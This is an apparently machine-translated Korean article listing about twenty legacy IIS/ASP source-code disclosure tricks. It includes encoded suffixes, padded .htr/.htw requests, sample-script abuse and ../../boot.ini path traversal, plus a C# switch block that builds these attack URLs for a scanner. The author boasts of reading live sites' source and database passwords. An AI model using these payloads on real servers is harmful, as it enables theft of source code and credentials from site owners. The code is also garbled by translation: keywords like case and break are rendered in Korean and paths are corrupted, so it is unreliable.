ASP 프로그램 소스 코드보기를위한 20 가지 방법 및 도구

저자：Eve Cole 업데이트 시간：2025-03-13 14:32:01

우리 모두가 알다시피, Windows 플랫폼에는 많은 허점이 있으며 패치는 차례가되지만 항상 그것을 보충하기에 충분하지 않습니다. ASP 소스 코드를보고있는 20 가지 방법을 요약하고 C#에 이러한 취약점을 스캔하는 응용 프로그램을 작성했습니다. 그러나 지난 이틀 동안 데이터베이스 비밀번호를 포함한 많은 웹 사이트의 소스 코드를 실제로 보았으며 라이브러리를 다운로드 할 수 있으며 SQL Server를 사용하면 TCP /IP 네트워크 라이브러리를 사용 할 수도 있습니다. 데이터베이스와 원하는대로하십시오. 먼저 아래 에이 20 가지 방법을 나열하십시오.

%81

::데이터

%2e

%2e%41sp

+.htr

longhtr

.BAK

codebrws.asp

showcode.asp

null.htw

qfullhit.htw

qsumrhit.htw

query.idq

검색/qfullhit.htw

검색/qsumrhit.htw

iirturnh.htw

.htw

번역 : f

위의 취약점 중 첫 10 개는 ASP 파일에 직접 추가됩니다 : F 메소드는 브라우저를 통해 직접 사용할 수 없습니다 내 사이트에서 모든 것을 다운로드하십시오.

switch (this.cbomethod.selectedIndex)

{

사례 0 : // 직접 읽습니다

strrequestfile = strserver + strurl;

부서지다;

사례 5 : //%2e%41sp

strrequestfile = strserver + stratp + strfirst

+ %2e %41sp;

부서지다;

사례 8 : // longhtr

strrequestfile = strserver + strurl

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htr;

부서지다;

사례 10 : //codebrws.asp

strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source=

+ Strurl;

부서지다;

사례 11 : //showcode.asp

strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source=

+ /msadc/../../../oot.ini;

부서지다;

사례 12 : //null.htw

strrequestfile = strserver + /null.htw?ciwebhitsfile=

+ strurl + %20 & cirestriction = none & cihiliteType = full;

부서지다;

사례 13 : //qfullhit.htw

strrequestfile = strserver + /iissamples/issamples/oop/qfullhit.htw?

+ ciwebhitsfile =/../../boot.ini & cirestriction = none

+ & cihiliteType = full;

부서지다;

사례 14 : //qsumrhit.htw

strrequestfile = strserver + /iissamples/issamples/oop/qsumrhit.htw?

+ ciwebhitsfile =/../../boot.ini & cirestriction = none

+ & cihiliteType = full;

부서지다;

사례 15 : //query.idq

strrequestfile = strserver +/query.idq?citemplate=/../../../boot.ini

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%.htx;

부서지다;

사례 16 : //search/qfullhit.htw

strrequestfile = strserver + /iissamples/exair/search/qfullhit.htw?

+ ciwebhitsfile =/../../boot.ini & cirestriction = none

+ & cihiliteType = full;

부서지다;

사례 17 : // 검색/qsumrhit.htw

strrequestfile = strserver + /iissamples/exair/search/qsumrhit.htw?

+ ciwebhitsfile =/../../boot.ini & cirestriction = none

+ & cihiliteType = full;

부서지다;

사례 18 : //iirturnh.htw

strrequestfile = strserver + /iishelp/iis/misc/iirturnh.htw?

+ ciwebhitsfile =/../../boot.ini & cirestriction = none

+ & cihiliteType = full;

부서지다;

사례 19 : //.htw

strrequestfile = strserver + strurl

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20

+%20%20%20%20%20%20%20%20%20%.htw?

+ ciwebhitsfile =/../../boot.ini & cirestriction = none

+ & cihiliteType = full;

부서지다;

기본:

strrequestfile = strserver + strurl + this.cbomethod.text;

}